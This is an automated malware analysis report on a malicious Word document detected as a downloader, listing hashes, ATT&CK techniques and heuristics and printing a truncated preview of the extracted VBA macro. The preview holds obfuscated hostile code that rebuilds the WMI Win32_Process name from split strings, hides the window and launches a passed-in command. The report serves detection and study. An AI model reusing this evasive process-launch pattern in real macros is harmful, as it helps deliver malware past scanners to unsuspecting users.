Office (OLE) malware analysis — malicious · 34e97c25dfaad76f

MALICIOUS

Office (OLE)

302.5 KB Created: 2019-02-19 12:23:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 95f0a3ad19adf4d031367ef1f2aa5f06 SHA-1: 3ea1d60bed37777ecb623543f7964956fa2c07ef SHA-256: 34e97c25dfaad76f71eaf079a544593981efd8a7b2e27cbab81cf1fe5f29bcc8

342 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros with an autoopen function, indicating it is designed to execute malicious code upon opening. The critical heuristics indicate the use of WMI (Win32_Process) via GetObject/CreateObject to launch a process, and obfuscation techniques were used to hide the Win32_Process keyword. This strongly suggests the macro's purpose is to download and execute a second-stage payload.

Heuristics 9

ClamAV: Doc.Downloader.00536d-6862684-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6862684-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 51428 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	51428 bytes
SHA-256: `e8644ab9b58411a0e3cb06c8611977522caa4dba164a4e85ee2652985dffe2de`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "I0__0_" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "T4_81481" Function f709_4() If Y1_7_5 <> Q0837_73 Then O501_1 = 462279783 + CSng(646922814) * 426550951 * ChrB(278708213) * (s2_28332 / CDbl(681361924 + CBool(u97_29_4 - Int(217343375 / n_8650 * 35561126 / Cos(o68_6755)))) - (q747_753 + Oct(376008727) + 62220411 / 695329017)) End If If S_9684_9 <> Y484_8 Then o493__5 = 601236161 + CSng(847030744) * 777473967 * ChrB(584594886) * (q51__7 / CDbl(104899520 + CBool(u24_42 - Int(952278284 / Y2775532 * 751081162 / Cos(W31_20_8)))) - (E5_767__ + Oct(597708692) + 251677113 / 648957877)) End If If p3__64_6 <> Y54749__ Then u7830_ = 361529067 + CSng(919350060) * 597586438 * ChrB(178376220) * (G0_167 / CDbl(399117076 + CBool(B_9578 - Int(347156354 / I869_59 * 751491342 / Cos(u__2164)))) - (L369_1_ + Oct(499192039) + 989368886 / 915534816)) End If If Y31_45 <> p___2__3 Then n27311_9 = 290946588 + CSng(501293917) * 932423572 * ChrB(403197585) * (p_8_1_ / CDbl(887220291 + CBool(s__10201 - Int(497545975 / j_8421_0 * 56079041 / Cos(U0913642)))) - (R6941_28 + Oct(578132050) + 430630128 / 434877598)) End If If H__0_2 <> m68652 Then E9_40_34 = 172747150 + CSng(216404768) * 846397576 * ChrB(464005215) * (W_284870 / CDbl(406737237 + CBool(X5_91_91 - Int(326090707 / f463_989 * 258781800 / Cos(D__4__73)))) - (o54049 + Oct(137858736) + 470748258 / 263028495)) End If If a48142 <> V8_47343 Then b6636676 = 567358446 + CSng(248739113) * 556048243 * ChrB(437964283) * (A_3_215 / CDbl(514603634 + CBool(P3_5_6 - Int(969815783 / D9__5_28 * 864625088 / Cos(W_77471)))) - (L8142_ + Oct(222984383) + 501675228 / 165838528)) End If End Function Function c27899_(w_4____0, l3_22__2) On Error Resume Next If Z109118 <> V66268_ Then H5__1_2_ = 844715734 + CSng(395221105) * 658270072 * ChrB(425636764) * (p592027_ / CDbl(808172764 + CBool(t5033__ - Int(460253418 / k_81_72 * 225304352 / Cos(B_68__)))) - (Z557_7 + Oct(146677881) + 434606195 / 438712025)) End If If Q2__3_ <> M58_23 Then C_93__7 = 60182970 + CSng(727304037) * 557091221 * ChrB(411540652) * (r_0243 / CDbl(107071437 + CBool(s89921 - Int(373566692 / f20_0_2 * 477917177 / Cos(w497816)))) - (n_105_11 + Oct(623475700) + 149028133 / 819414475)) End If Set I_97249 = GetObject(z_15_5_ + "winmgm" + p72_4229 + "ts:Win" + "32_Proce" + "ssStartup") If S441____ <> E577__0 Then M8__5038 = 954442359 + CSng(633057558) * 874450504 * ChrB(151896561) * (S_50__79 / CDbl(676186586 + CBool(o_2_0283 - Int(921533185 / T4_693 * 980135657 / Cos(S802893)))) - (L0_3580 + Oct(108775424) + 583142357 / 276339823)) End If If h0526900 <> z_5__688 Then o923_2 = 384031970 + CSng(364263020) * 444498563 * ChrB(499760515) * (D_06_71 / CDbl(971990771 + CBool(H711_6 - Int(249131943 / D_121822 * 266753494 / Cos(M6_7_55)))) - (B810870 + Oct(173616548) + 963489741 / 136660483)) End If I_97249.ShowWindow = 604001 - 604001 If S__86_ <> k1103580 Then b___82 = 358461506 + CSng(394232115) * 323698724 * ChrB(619366484) * (n_77__ / CDbl(893396750 + CBool(d____0 - Int(991562658 / u852__77 * 440680674 / Cos(A75_74)))) - (l8__31 + Oct(964216698) + 791640849 / 979881406)) End If If h42_04 <> D738_53 Then J1_612 = 778818042 + CSng(778783999) * 333404637 * ChrB(314172432) * (s27983 / CDbl(224814906 + CBool(O63_4199 - Int(688861695 / f5529_ * 623633892 / Cos(H6__545)))) - (R2__5_99 + Oct(612510156) + 736156283 / 47010927)) End If GetObject((T87_7_9 + "winmg" + "mts:Wi" + z5431329 + "n32_Process")).Create (i8_262 + w_4____0 + o_75_5 + f599_6 + h3__3__ + W19__86), D7_4011, I_97249, w965491_ If i41_3__ <> E77847_8 Then w34352 = 702926902 + CSng(498160844) * 397493230 * ChrB(901952146) * (W5332__ / CDbl(874263635 + CBool(A1_589 - Int(321545816 / Z3894510 * 837170600 / Cos(c189125)))) - (B__103 + Oct(210690946) + 195492987 / 37043539)) En ... (truncated)

SHA-256: e8644ab9b58411a0e3cb06c8611977522caa4dba164a4e85ee2652985dffe2de

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "I0__0_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "T4_81481"
Function f709_4()
   If Y1_7_5 <> Q0837_73 Then
O501_1 = 462279783 + CSng(646922814) * 426550951 * ChrB(278708213) * (s2_28332 / CDbl(681361924 + CBool(u97_29_4 - Int(217343375 / n_8650 * 35561126 / Cos(o68_6755)))) - (q747_753 + Oct(376008727) + 62220411 / 695329017))
End If
   If S_9684_9 <> Y484_8 Then
o493__5 = 601236161 + CSng(847030744) * 777473967 * ChrB(584594886) * (q51__7 / CDbl(104899520 + CBool(u24_42 - Int(952278284 / Y2775532 * 751081162 / Cos(W31_20_8)))) - (E5_767__ + Oct(597708692) + 251677113 / 648957877))
End If
   If p3__64_6 <> Y54749__ Then
u7830_ = 361529067 + CSng(919350060) * 597586438 * ChrB(178376220) * (G0_167 / CDbl(399117076 + CBool(B_9578 - Int(347156354 / I869_59 * 751491342 / Cos(u__2164)))) - (L369_1_ + Oct(499192039) + 989368886 / 915534816))
End If
   If Y31_45 <> p___2__3 Then
n27311_9 = 290946588 + CSng(501293917) * 932423572 * ChrB(403197585) * (p_8_1_ / CDbl(887220291 + CBool(s__10201 - Int(497545975 / j_8421_0 * 56079041 / Cos(U0913642)))) - (R6941_28 + Oct(578132050) + 430630128 / 434877598))
End If
   If H__0_2 <> m68652 Then
E9_40_34 = 172747150 + CSng(216404768) * 846397576 * ChrB(464005215) * (W_284870 / CDbl(406737237 + CBool(X5_91_91 - Int(326090707 / f463_989 * 258781800 / Cos(D__4__73)))) - (o54049 + Oct(137858736) + 470748258 / 263028495))
End If
   If a48142 <> V8_47343 Then
b6636676 = 567358446 + CSng(248739113) * 556048243 * ChrB(437964283) * (A_3_215 / CDbl(514603634 + CBool(P3_5_6 - Int(969815783 / D9__5_28 * 864625088 / Cos(W_77471)))) - (L8142_ + Oct(222984383) + 501675228 / 165838528))
End If
End Function
Function c27899_(w_4____0, l3_22__2)
On Error Resume Next
   If Z109118 <> V66268_ Then
H5__1_2_ = 844715734 + CSng(395221105) * 658270072 * ChrB(425636764) * (p592027_ / CDbl(808172764 + CBool(t5033__ - Int(460253418 / k_81_72 * 225304352 / Cos(B_68__)))) - (Z557_7 + Oct(146677881) + 434606195 / 438712025))
End If
   If Q2__3_ <> M58_23 Then
C_93__7 = 60182970 + CSng(727304037) * 557091221 * ChrB(411540652) * (r_0243 / CDbl(107071437 + CBool(s89921 - Int(373566692 / f20_0_2 * 477917177 / Cos(w497816)))) - (n_105_11 + Oct(623475700) + 149028133 / 819414475))
End If
Set I_97249 = GetObject(z_15_5_ + "winmgm" + p72_4229 + "ts:Win" + "32_Proce" + "ssStartup")
   If S441____ <> E577__0 Then
M8__5038 = 954442359 + CSng(633057558) * 874450504 * ChrB(151896561) * (S_50__79 / CDbl(676186586 + CBool(o_2_0283 - Int(921533185 / T4_693 * 980135657 / Cos(S802893)))) - (L0_3580 + Oct(108775424) + 583142357 / 276339823))
End If
   If h0526900 <> z_5__688 Then
o923_2 = 384031970 + CSng(364263020) * 444498563 * ChrB(499760515) * (D_06_71 / CDbl(971990771 + CBool(H711_6 - Int(249131943 / D_121822 * 266753494 / Cos(M6_7_55)))) - (B810870 + Oct(173616548) + 963489741 / 136660483))
End If
I_97249.ShowWindow = 604001 - 604001
   If S__86_ <> k1103580 Then
b___82 = 358461506 + CSng(394232115) * 323698724 * ChrB(619366484) * (n_77__ / CDbl(893396750 + CBool(d____0 - Int(991562658 / u852__77 * 440680674 / Cos(A75_74)))) - (l8__31 + Oct(964216698) + 791640849 / 979881406))
End If
   If h42_04 <> D738_53 Then
J1_612 = 778818042 + CSng(778783999) * 333404637 * ChrB(314172432) * (s27983 / CDbl(224814906 + CBool(O63_4199 - Int(688861695 / f5529_ * 623633892 / Cos(H6__545)))) - (R2__5_99 + Oct(612510156) + 736156283 / 47010927))
End If
GetObject((T87_7_9 + "winmg" + "mts:Wi" + z5431329 + "n32_Process")).Create (i8_262 + w_4____0 + o_75_5 + f599_6 + h3__3__ + W19__86), D7_4011, I_97249, w965491_
   If i41_3__ <> E77847_8 Then
w34352 = 702926902 + CSng(498160844) * 397493230 * ChrB(901952146) * (W5332__ / CDbl(874263635 + CBool(A1_589 - Int(321545816 / Z3894510 * 837170600 / Cos(c189125)))) - (B__103 + Oct(210690946) + 195492987 / 37043539))
En
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.